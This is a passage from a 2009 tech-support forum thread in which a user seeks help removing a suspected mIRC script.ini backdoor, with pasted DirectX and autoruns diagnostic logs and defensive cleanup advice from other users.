Name: Intel(R) ICH8 Family PCI Express Root Port 3 - 2843
Device ID: PCI\VEN_8086&DEV_2843&SUBSYS_11231734&REV_03\3&21436425&0&E2
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 151096 bytes

Name: Intel(R) ICH8 Family PCI Express Root Port 2 - 2841
Device ID: PCI\VEN_8086&DEV_2841&SUBSYS_11231734&REV_03\3&21436425&0&E1
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 151096 bytes

Name: Intel(R) ICH8 Family PCI Express Root Port 1 - 283F
Device ID: PCI\VEN_8086&DEV_283F&SUBSYS_11231734&REV_03\3&21436425&0&E0
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 151096 bytes

Name: Intel(R) ICH8 Family SMBus Controller - 283E
Device ID: PCI\VEN_8086&DEV_283E&SUBSYS_11231734&REV_03\3&21436425&0&FB
Driver: n/a

Name: Intel(R) ICH8 Family USB2 Enhanced Host Controller - 283A
Device ID: PCI\VEN_8086&DEV_283A&SUBSYS_11231734&REV_03\3&21436425&0&D7
Driver: C:\Windows\system32\drivers\usbehci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 39424 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes
Driver: C:\Windows\system32\hccoin.dll, 6.00.6000.16386 (English), 11/2/2006 10:46:05, 8704 bytes
Driver: C:\Windows\system32\hcrstco.dll, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 15872 bytes

Name: Intel(R) ICH8 Family USB2 Enhanced Host Controller - 2836
Device ID: PCI\VEN_8086&DEV_2836&SUBSYS_11231734&REV_03\3&21436425&0&EF
Driver: C:\Windows\system32\drivers\usbehci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 39424 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes
Driver: C:\Windows\system32\hccoin.dll, 6.00.6000.16386 (English), 11/2/2006 10:46:05, 8704 bytes
Driver: C:\Windows\system32\hcrstco.dll, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 15872 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2835
Device ID: PCI\VEN_8086&DEV_2835&SUBSYS_11231734&REV_03\3&21436425&0&D1
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2834
Device ID: PCI\VEN_8086&DEV_2834&SUBSYS_11231734&REV_03\3&21436425&0&D0
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2832
Device ID: PCI\VEN_8086&DEV_2832&SUBSYS_11231734&REV_03\3&21436425&0&EA
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2831
Device ID: PCI\VEN_8086&DEV_2831&SUBSYS_11231734&REV_03\3&21436425&0&E9
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2830
Device ID: PCI\VEN_8086&DEV_2830&SUBSYS_11231734&REV_03\3&21436425&0&E8
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) 82801HEM/HBM SATA AHCI Controller
Device ID: PCI\VEN_8086&DEV_2829&SUBSYS_11231734&REV_03\3&21436425&0&FA
Driver: C:\Windows\system32\DRIVERS\iaStor.sys, 7.05.0000.1017 (English), 3/21/2007 11:58:56, 304920 bytes

Name: Intel(R) ICH8M LPC Interface Controller - 2815
Device ID: PCI\VEN_8086&DEV_2815&SUBSYS_11231734&REV_03\3&21436425&0&F8
Driver: C:\Windows\system32\DRIVERS\msisadrv.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 16440 bytes

Name: Intel(R) 82801 PCI Bridge - 2448
Device ID: PCI\VEN_8086&DEV_2448&SUBSYS_11231734&REV_F3\3&21436425&0&F0
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 151096 bytes

Name: Atheros AR5007EG Wireless Network Adapter
Device ID: PCI\VEN_168C&DEV_001C&SUBSYS_3067168C&REV_04\4&2347B994&0&00E2
Driver: C:\Windows\system32\DRIVERS\athr.sys, 7.03.0001.0042 (English), 6/18/2007 17:03:32, 737280 bytes

Name: Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.0)
Device ID: PCI\VEN_10EC&DEV_8136&SUBSYS_11231734&REV_01\4&1981078&0&00E0
Driver: C:\Windows\system32\DRIVERS\Rtlh86.sys, 6.196.0803.2007 (English), 8/3/2007 09:44:58, 91648 bytes

------------------
DirectShow Filters
------------------

DirectShow Filters:
InterVideo G726Dec DMO,0x00600800,1,1,,
WMAudio Decoder DMO,0x00800800,1,1,,
WMAPro over S/PDIF DMO,0x00600800,1,1,,
WMSpeech Decoder DMO,0x00600800,1,1,,
MP3 Decoder DMO,0x00600800,1,1,,
Mpeg4s Decoder DMO,0x00800001,1,1,,
WMV Screen decoder DMO,0x00600800,1,1,,
WMVideo Decoder DMO,0x00800001,1,1,,
Mpeg43 Decoder DMO,0x00800001,1,1,,
Mpeg4 Decoder DMO,0x00800001,1,1,,
Ulead Full TS To Partial TS,0x00200000,1,1,ulFullTS2PartialTS.ax,1.00.0000. 0008
InterVideo Video Decoder,0x00700000,2,4,IVIVIDEO.ax,8.00.0006.0193
ffdshow Video Decoder,0xff800001,2,1,ffdshow.ax,1.00.0005.2052
Full Screen Renderer,0x00200000,1,0,,6.06.6001.18063
CoreAVC Video Decoder,0x00600000,1,1,AVCDX.ax,0.00.0000.0004
Dirac Source,0x00600000,0,0,DiracSplitter.ax,1.00.0000.0 000
ffdshow raw video filter,0x00200000,2,1,ffdshow.ax,1.00.0005.2052
Multiple File Output,0x00200000,2,2,WMM2FILT.dll,
WMT Black Frame Generator,0x00200000,1,1,WMM2FILT.dll,
ffdshow Audio Decoder,0x3fffffff,1,1,ffdshow.ax,1.00.0005.2052
WMT Import Filter,0x00200000,0,1,WMM2FILT.dll,
DV Muxer,0x00400000,0,0,,6.06.6001.18000
Color Space Converter,0x00400001,1,1,,6.06.6001.18063
WMT Interlacer,0x00200000,1,1,WMM2FILT.dll,
WM ASF Reader,0x00400000,0,0,,11.00.6001.7000
Screen Capture filter,0x00200000,0,1,wmpsrcwp.dll,11.00.6001.7000
AVI Splitter,0x00600000,1,1,,6.06.6001.18063
VGA 16 Color Ditherer,0x00400000,1,1,,6.06.6001.18063
Microsoft MPEG-2 Video Decoder,0x005fffff,2,4,msmpeg2vdec.dll,11.00.6001. 7000
MPEG2 TS Source,0x00200000,0,1,MpgTsRdr.ax,
RealVideo Decoder,0x00400000,1,1,RealMediaDX.ax,1.00.0001.00 01
Intervideo 3gFileSource,0x00200000,0,2,Source3g.ax,9.00.0000. 0000
AC3 Parser Filter,0x00600000,1,1,mpg2splt.ax,6.06.6001.18000
WMT Format Conversion,0x00200000,1,1,WMM2FILT.dll,
9x8Resize,0x00200000,1,1,WMM2FILT.dll,
StreamBufferSink,0x00200000,0,0,sbe.dll,6.06.6001. 18000
Intervideo AMR Decoder,0x00200000,1,1,AmrDec.ax,8.01.0000.0000
WMT Virtual Source,0x00200000,0,1,WMM2FILT.dll,
MJPEG Decompressor,0x00600000,1,1,,6.06.6001.18063
InterVideo Demultiplexer,0x00200000,1,1,ividemux.ax,3.02.0055 .0000
MPEG-I Stream Splitter,0x00600000,1,2,,6.06.6001.18063
SAMI (CC) Parser,0x00400000,1,1,,6.06.6001.18063
VBI Codec,0x00600000,1,4,VBICodec.ax,6.06.6001.18000
MPC - MPEG-2 Video Decoder (Gabest),0x00500001,1,1,Mpeg2DecFilter.ax,1.01.079 6.0000
MPEG-2 Splitter,0x005fffff,1,0,mpg2splt.ax,6.06.6001.1800 0
Ulead Http Stream Push Source Filter,0x00400000,0,1,ulHttpPushSource.ax,1.00.000 0.0000
WMT AudioAnalyzer,0x00200000,1,1,WMM2FILT.dll,
AAC Parser,0x00400000,1,1,aac_parser.ax,1.01.0000.0000
Intervideo TsSplitter Filter,0x00200000,1,2,TsSplitter.ax,1.00.0001.0041
RadLight APE DirectShow Filter,0x00600000,0,1,RLAPEDec.ax,1.00.0000.0000
Microsoft MPEG-2 Video Encoder,0x00200000,2,0,msmpeg2enc.dll,11.00.6001.7 000
Stretch Video,0x00200000,1,1,WMM2FILT.dll,
FLV Splitter,0x00600000,1,1,flvDX.dll,1.00.0000.0001
Internal Script Command Renderer,0x00800001,1,0,,6.06.6001.18063
MPEG Audio Decoder,0x03680001,1,1,,6.06.6001.18063
WavPack Audio Decoder,0x00600000,1,1,WavPackDSDecoder.ax,1.01.00 00.0484
DV Splitter,0x00600000,1,2,,6.06.6001.18000
Video Mixing Renderer 9,0x00200000,1,0,,6.06.6001.18063
Haali Media Splitter,0x00800001,0,1,splitter.ax,1.07.0401.0003
Haali Media Splitter (AR),0x00400000,1,1,splitter.ax,1.07.0401.0003
Dirac Splitter,0x00600000,1,1,DiracSplitter.ax,1.00.0000 .0000
Microsoft MPEG-2 Encoder,0x00200000,2,1,msmpeg2enc.dll,11.00.6001.7 000
Frame Eater,0x00200000,1,1,WMM2FILT.dll,
Allocator Fix,0x00200000,1,1,WMM2FILT.dll,
ACM Wrapper,0x00600000,1,1,,6.06.6001.18063
CoreAAC Audio Decoder,0x00800000,1,1,CoreAAC.ax,1.02.0000.0575
Video Renderer,0x00800001,1,0,,6.06.6001.18063
MPEG-2 Video Stream Analyzer,0x00200000,0,0,sbe.dll,6.06.6001.18000
Capture ASF Writer,0x00200000,0,0,WMM2FILT.dll,
Line 21 Decoder,0x00600000,1,1,,6.06.6001.18000
Video Port Manager,0x00600000,2,1,,6.06.6001.18063
Video Renderer,0x00400000,1,0,,6.06.6001.18063
Bitmap Generate,0x00200000,1,1,WMM2FILT.dll,
Proxy Sink,0x00200000,1,0,WMM2FILT.dll,
Haali Video Renderer,0x00200000,1,0,dxr.dll,
RealMedia Source,0x00600000,0,0,RealMediaDX.ax,1.00.0001.000 1
Proxy Source,0x00200000,0,1,WMM2FILT.dll,
WM ASF Writer,0x00400000,0,0,,11.00.6001.7000
FLV Video Decoder,0x00600000,1,1,flvDX.dll,1.00.0000.0001
InterVideo Audio Decoder,0x00700000,1,1,iviaudio.ax,8.00.0006.0193
VBI Surface Allocator,0x00600000,1,1,vbisurf.ax,6.00.6001.1800 0
InterVideo PSIP/SI Filter,0x00200000,0,0,PsiDecod.ax,1.05.0000.0001
WMT Sample Information Filter,0x00200000,1,1,WMM2FILT.dll,
File writer,0x00200000,1,0,,6.06.6001.18000
RadLight MPC DirectShow Filter,0x00600000,0,1,RLMPCDec.ax,1.00.0000.0004
Haali Simple Media Splitter,0x00200000,0,1,splitter.ax,1.07.0401.0003
DirectVobSub,0x00200000,2,1,VSFilter.dll,1.01.0796 .0000
RealAudio Decoder,0x00400000,1,1,RealMediaDX.ax,1.00.0001.00 01
Honestech VCD/SVCD Encoder,0x00200000,2,0,htvcdsvcd.ax,1.00.0000.0000
DirectVobSub (auto-loading version),0x00800002,2,1,VSFilter.dll,1.01.0796.000 0
DVD Navigator,0x00200000,0,3,,6.06.6001.18000
WMT DV Extract,0x00200000,1,1,WMM2FILT.dll,
Overlay Mixer2,0x00200000,1,1,,6.06.6001.18000
Haali Matroska Muxer,0x00200000,1,0,splitter.ax,1.07.0401.0003
AC3Filter,0x40000000,1,1,ac3filter.ax,1.03.0001.00 00
AVI Draw,0x00600064,9,1,,6.06.6001.18063
muvee Video Analyser,0x00200000,1,0,mvvanalyse.ax,4.00.0004.00 00
muvee Music Analyser,0x00200000,1,0,mvmanalyse.ax,4.00.0004.00 00
InterVideo Navigator,0x00190000,0,3,IVInav.ax,8.00.0006.0193
Microsoft MPEG-2 Audio Encoder,0x00200000,2,0,msmpeg2enc.dll,11.00.6001.7 000
WST Pager,0x00800000,1,1,WSTPager.ax,6.06.6001.18000
MPEG-2 Demultiplexer,0x00600000,1,1,mpg2splt.ax,6.06.6001 .18000
Record Queue,0x00200000,1,1,WMM2FILT.dll,
DV Video Decoder,0x00800000,1,1,,6.06.6001.18000
Intervideo QT source,0x00200000,0,1,iviQTsource.ax,1.00.0000.000 1
Ulead WMV/WMA Source Filter,0x00600000,0,2,UleadWMSrcFilter.ax,0.00.000 0.0003
ffdshow Audio Processor,0x00200000,1,1,ffdshow.ax,1.00.0005.2052
SampleGrabber,0x00200000,1,1,qedit.dll,6.06.6001.1 8000
Null Renderer,0x00200000,1,0,qedit.dll,6.06.6001.18000
WMT Log Filter,0x00200000,1,1,WMM2FILT.dll,
Aspect Ratio Resizer 16x9,0x00200000,1,1,AspectRatioConverter16x9.ax,4. 00.0004.0000
MPEG-2 Sections and Tables,0x005fffff,1,0,Mpeg2Data.ax,6.06.6001.18000
WMT Virtual Renderer,0x00200000,1,0,WMM2FILT.dll,
FLV Source,0x00600000,0,0,flvDX.dll,1.00.0000.0001
StreamBufferSource,0x00200000,0,0,sbe.dll,6.06.600 1.18000
Smart Tee,0x00200000,1,2,,6.06.6001.18000
Overlay Mixer,0x00200000,0,0,,6.06.6001.18000
AVI Decompressor,0x00600000,1,1,,6.06.6001.18063
WMT MuxDeMux Filter,0x00200000,0,0,WMM2FILT.dll,
AVI/WAV File Source,0x00400000,0,2,,6.06.6001.18063
WMT Volume,0x00200000,1,1,WMM2FILT.dll,
Wave Parser,0x00400000,1,1,,6.06.6001.18063
MIDI Parser,0x00400000,1,1,,6.06.6001.18063
Multi-file Parser,0x00400000,1,1,,6.06.6001.18063
File stream renderer,0x00400000,1,1,,6.06.6001.18063
A/V Dummy Filter,0x00200000,1,0,SmabT.spk,
WavPack Audio Splitter,0x00600000,1,1,WavPackDSSplitter.ax,1.01. 0000.0323
ffdshow subtitles filter,0x00200000,2,1,ffdshow.ax,1.00.0005.2052
WMT VIH2 Fix,0x00200000,1,1,WMM2FILT.dll,
Microsoft MPEG-1/DD Audio Decoder,0x005fffff,1,1,msmpeg2adec.dll,11.00.6001. 7000
RealMedia Splitter,0x00600000,1,1,RealMediaDX.ax,1.00.0001.0 001
AVI Mux,0x00200000,1,0,,6.06.6001.18000
Line 21 Decoder 2,0x00600002,1,1,,6.06.6001.18063
File Source (Async.),0x00400000,0,1,,6.06.6001.18063
File Source (URL),0x00400000,0,1,,6.06.6001.18063
AudioRecorder WAV Dest,0x00200000,0,0,,6.00.6001.18000
AudioRecorder Wave Form,0x00200000,0,0,,6.00.6001.18000
SoundRecorder Null Renderer,0x00200000,0,0,,6.00.6001.18000
Ulead Http Stream Source (Async.),0x00400000,0,1,AsyncHttpStream.ax,1.00.00 00.0001
Haali Video Sink,0x00200000,1,0,splitter.ax,1.07.0401.0003
Aspect Ratio Resizer 4x3,0x00200000,1,1,AspectRatioConverter4x3.ax,4.00 .0004.0000
Dirac Video Decoder,0x00400000,1,1,DiracSplitter.ax,1.00.0000. 0000
Infinite Pin Tee Filter,0x00200000,1,1,,6.06.6001.18000
WMT Switch Filter,0x00200000,1,1,WMM2FILT.dll,
Enhanced Video Renderer,0x00200000,1,0,evr.dll,6.00.6001.22164
Uncompressed Domain Shot Detection Filter,0x00200000,1,1,WMM2FILT.dll,
BDA MPEG2 Transport Information Filter,0x00200000,2,0,psisrndr.ax,6.06.6001.18000
InterVideo Subtitle,0x00200000,1,1,IVISubtitle.ax,1.00.0000.0 000
MPEG Video Decoder,0x40000001,1,1,,6.06.6001.18063

WDM Streaming Tee/Splitter Devices:
Tee/Sink-to-Sink Converter,0x00200000,1,1,,6.00.6001.18000

Video Compressors:
WMVideo8 Encoder DMO,0x00600800,1,1,,
WMVideo9 Encoder DMO,0x00600800,1,1,,
MSScreen 9 encoder DMO,0x00600800,1,1,,
DV Video Encoder,0x00200000,0,0,,6.06.6001.18000
ffdshow video encoder,0x00100000,1,1,ffdshow.ax,1.00.0005.2052
MJPEG Compressor,0x00200000,0,0,,6.06.6001.18063
Cinepak Codec by Radius,0x00200000,1,1,,6.06.6001.18000
ffdshow Video Codec,0x00200000,1,1,,6.06.6001.18000
Helix I420 YUV Codec,0x00200000,1,1,,6.06.6001.18000
Intel IYUV codec,0x00200000,1,1,,6.06.6001.18000
Microsoft RLE,0x00200000,1,1,,6.06.6001.18000
Microsoft Video 1,0x00200000,1,1,,6.06.6001.18000
Helix YV12 YUV Codec,0x00200000,1,1,,6.06.6001.18000

Audio Compressors:
WM Speech Encoder DMO,0x00600800,1,1,,
WMAudio Encoder DMO,0x00600800,1,1,,
IMA ADPCM,0x00200000,1,1,,6.06.6001.18063
PCM,0x00200000,1,1,,6.06.6001.18063
Microsoft ADPCM,0x00200000,1,1,,6.06.6001.18063
GSM 6.10,0x00200000,1,1,,6.06.6001.18063
CCITT A-Law,0x00200000,1,1,,6.06.6001.18063
CCITT u-Law,0x00200000,1,1,,6.06.6001.18063
AC3,0x00200000,1,1,,6.06.6001.18063
DTS,0x00200000,1,1,,6.06.6001.18063
MPEG Layer-3,0x00200000,1,1,,6.06.6001.18063

Midi Renderers:
Default MidiOut Device,0x00800000,1,0,,6.06.6001.18063
Microsoft GS Wavetable Synth,0x00200000,1,0,,6.06.6001.18063

WDM Streaming Capture Devices:
,0x00000000,0,0,,
,0x00000000,0,0,,

WDM Streaming Rendering Devices:
Realtek HD Audio output,0x00200000,1,1,,6.00.6001.18000

BDA Network Providers:
Microsoft ATSC Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.6000.16386
Microsoft DVBC Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.6000.16386
Microsoft DVBS Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.6000.16386
Microsoft DVBT Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.6000.16386
Microsoft Network Provider,0x00200000,0,1,MSNP.ax,6.06.6001.18000

Multi-Instance Capable VBI Codecs:
VBI Codec,0x00600000,1,4,VBICodec.ax,6.06.6001.18000

BDA Transport Information Renderers:
BDA MPEG2 Transport Information Filter,0x00600000,2,0,psisrndr.ax,6.06.6001.18000
MPEG-2 Sections and Tables,0x00600000,1,0,Mpeg2Data.ax,6.06.6001.18000

BDA CP/CA Filters:
Decrypt/Tag,0x00600000,1,0,EncDec.dll,6.06.6001.18000
Encrypt/Tag,0x00200000,0,0,EncDec.dll,6.06.6001.18000
XDS Codec,0x00200000,0,0,EncDec.dll,6.06.6001.18000

WDM Streaming Communication Transforms:
Tee/Sink-to-Sink Converter,0x00200000,1,1,,6.00.6001.18000

Audio Renderers:
Speakers (Realtek High Definiti,0x00200000,1,0,,6.06.6001.18063
Default DirectSound Device,0x00800000,1,0,,6.06.6001.18063
Default WaveOut Device,0x00200000,1,0,,6.06.6001.18063
DirectSound: Speakers (Realtek High Definition Audio),0x00200000,1,0,,6.06.6001.18063

dox online
11-05-09, 19:37
What actually made you think that? Did your PC start acting up?

jamieoliver22
11-05-09, 19:59
As long as you didn't type it, you will be fine. I have had experience with it before, just don't type it in.

dox online
11-05-09, 20:15
As long as you didn't type it, you will be fine. I have had experience with it before, just don't type it in. I think they did... BTW why were you typing in suspicious things anyway?

pneboy
11-05-09, 20:36
I think they did... BTW why were you typing in suspicious things anyway?

i thought the person told me about it because i thought it would spam a channel and disconnect me for a minute or 2, im seriously in need of getting it out of my computer im not that tech savvy and i just want it out, avg came up clean but ive been told that wont find a penny in a pile of pennys

What actually made you think that? Did your PC start acting up?

well i went to the help channel and they said it was a backdoor and klined me from the network because i was a hazzard to other users so i cant get back on there till its gone

jamieoliver22
11-05-09, 20:39
I think they did... BTW why were you typing in suspicious things anyway?

I wasn't typing anything in? What are you on about? I was mealy saying that I have had experience with mIRC virues, being a mIRC user for a very long time.

spikejones
11-05-09, 21:13
1. never copy and paste or use any code that you can't read and don't know what it does, unless you get it from a very reliable source. Some guy on IRC or whatever service you are using does not count.

2. run and post the results of ardiag.exe (http://www.tombraiderhub.com/download/ardiag.exe)

3. according here at mcaffee http://vil.nai.com/vil/content/v_99962.htm, the backdoor trojan resides in the script.ini file in the mirc folder. when the mirc application is opened, the script loads and opens port 33 (UDP) making the victim susceptible to further mirc exploits.
-you may be able to get by with uninstalling the application, deleting the program directory, and reinstalling.

4. I'd still run ardiag though to ensure no other nasties have infiltrated your machine. Run kaspersky's free online scan as well (preferably prior to ardiag so we don't point out things it may have cleaned).
http://www.kaspersky.com/

jamieoliver22
11-05-09, 21:17
3. according here at mcaffee http://vil.nai.com/vil/content/v_99962.htm, the backdoor trojan resides in the script.ini file in the mirc folder. when the mirc application is opened, the script loads and opens port 33 (UDP) making the victim susceptible to further mirc exploits.
-you may be able to get by with uninstalling the application, deleting the program directory, and reinstalling.

In most cases, just deleting the script.ini file will fix it, unless the virus creates other additional files also - if I remember correctly anyway.

pneboy
11-05-09, 21:33
Copy the following text and paste it to your report AS IS!!!

---------------------------------------------------------------
AutoRuns Diagnostics for TRF v 0.5 Developed by EscondeR
---------------------------------------------------------------



Program:
"Provides the interface to Apple mobile devices."
Publisher:
"(Verified) Apple Inc."
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
Apple Mobile Device
Program path & name:
"c:\program files\common files\apple\mobile device support\bin\applemobiledeviceservice.exe"
Enabled: [V]


Program:
"AVG E-Mail Scanner"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
avg8emc
Program path & name:
"c:\program files\avg\avg8\avgemc.exe"
Enabled: [V]


Program:
"AVG Watchdog Service"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
avg8wd
Program path & name:
"c:\program files\avg\avg8\avgwdsvc.exe"
Enabled: [V]


Program:
"Bonjour allows applications like iTunes and Safari to advertise and discover services on the local network. Having Bonjour running enables you to connect to hardware devices like Apple TV and software services like iTunes sharing and AirTunes. If you disable Bonjour
Publisher:
any network service that explicitly depends on it will fail to start."
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
Bonjour Service
Program path & name:
"(Verified) Apple Inc.""c:\program files\bonjour\mdnsresponder.exe"
Enabled: [V]


Program:
"RegMgr Module"
Publisher:
"(Verified) Intervideo Inc."
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
IviRegMgr
Program path & name:
"c:\program files\common files\intervideo\regmgr\iviregmgr.exe"
Enabled: [V]


Program:
"Manages and controls the Fujitsu Siemens Computers Diagnostic Tools."
Publisher:
"(Not verified) Fujitsu Siemens Computers"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
TestHandler
Program path & name:
"c:\program files\fujitsu siemens computers\systemdiagnostics\onlinediagnostic\testm anager\testhandler.exe"
Enabled: [V]


Program:
"AnyDVD Filter Driver"
Publisher:
"(Verified) SlySoft Inc."
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
AnyDVD
Program path & name:
"c:\windows\system32\drivers\anydvd.sys"
Enabled: [V]


Program:
"AVG AVI Loader Driver"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
AvgLdx86
Program path & name:
"c:\windows\system32\drivers\avgldx86.sys"
Enabled: [V]


Program:
"AVG Network connection watcher"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
AvgTdiX
Program path & name:
"c:\windows\system32\drivers\avgtdix.sys"
Enabled: [V]


Program:
"ElbyCD Windows NT/2000/XP I/O driver"
Publisher:
"(Verified) Elaborate Bytes AG"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
ElbyCDIO
Program path & name:
"c:\windows\system32\drivers\elbycdio.sys"
Enabled: [V]


Program:
"IP in IP Tunnel Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
IpInIp
Program path & name:
File not found: system32\DRIVERS\ipinip.sys"
Enabled: [V]


Program:
"IPX Traffic Filter Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFlt
Program path & name:
File not found: system32\DRIVERS\nwlnkflt.sys"
Enabled: [V]


Program:
"IPX Traffic Forwarder Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFwd
Program path & name:
File not found: system32\DRIVERS\nwlnkfwd.sys"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
sptd
Program path & name:
c:\windows\system32\drivers\sptd.sys"
Enabled: [V]


Program:
"Google Desktop"
Publisher:
"(Not verified) Google"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls
Entry name:
C:\PROGRA~1\Google\GOOGLE~2\GOEC62~1.DLL
Program path & name:
"c:\program files\google\google desktop search\googledesktopnetwork3.dll"
Enabled: [V]


Program:
"AVG Resident Shield Starter"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls
Entry name:
avgrsstx.dll
Program path & name:
"c:\windows\system32\avgrsstx.dll"
Enabled: [V]


Program:
"HotkeyApp"
Publisher:
"(Not verified) Wistron"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
HotkeyApp
Program path & name:
"c:\program files\launch manager\hotkeyapp.exe"
Enabled: [V]


Program:
"Adobe Acrobat SpeedLauncher"
Publisher:
"(Verified) Adobe Systems Incorporated"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Adobe Reader Speed Launcher
Program path & name:
"c:\program files\adobe\reader 8.0\reader\reader_sl.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
CtrlVol
Program path & name:
File not found: C:\Program Files\Launch Manager\CtrlVol.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
LaunchAp
Program path & name:
File not found: C:\Program Files\Launch Manager\LaunchAp.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Wbutton
Program path & name:
File not found: C:\Program Files\Launch Manager\WButton.exe"
Enabled: [V]


Program:
"Google Desktop"
Publisher:
"(Verified) Google Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google Desktop Search
Program path & name:
"c:\program files\google\google desktop search\googledesktop.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NPCTray
Program path & name:
File not found: C:\Program Files\Norman\npc\bin\npc_tray.exe"
Enabled: [V]


Program:
" "
Publisher:
"(Not verified) "
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google EULA Launcher
Program path & name:
"c:\program files\google\google eula\googleeulalauncher.exe"
Enabled: [V]


Program:
"AVG Tray Monitor"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
AVG8_TRAY
Program path & name:
"c:\program files\avg\avg8\avgtray.exe"
Enabled: [V]


Program:
"Java(TM) Platform SE binary"
Publisher:
"(Verified) Sun Microsystems Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
SunJavaUpdateSched
Program path & name:
"c:\program files\java\jre1.6.0_07\bin\jusched.exe"
Enabled: [V]


Program:
"QuickTime Task"
Publisher:
"(Not verified) Apple Inc."
Entry path:
